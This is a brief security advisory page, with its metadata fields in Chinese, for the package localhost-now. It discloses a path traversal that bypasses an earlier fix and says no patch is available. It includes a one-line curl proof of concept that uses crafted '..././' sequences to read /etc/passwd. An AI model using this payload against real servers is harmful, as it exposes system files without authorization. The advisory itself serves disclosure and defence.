OSV 1.4.0 · github-reviewed · 修改于 2020-09-01 02:31
发布时间
2019-06-12 00:40
GitHub 审查时间
2019-06-12 00:40
NVD 发布时间
—
源文件
advisories/github-reviewed/2019/06/GHSA-73cw-jxmm-qpgh/GHSA-73cw-jxmm-qpgh.json
All versions of localhost-now are vulnerable to path traversal. This vulnerability is a bypass to the path traversal fix introduced in version 1.0.2
Proof of concept:
$ curl -v --path-as-is "http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd"
No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.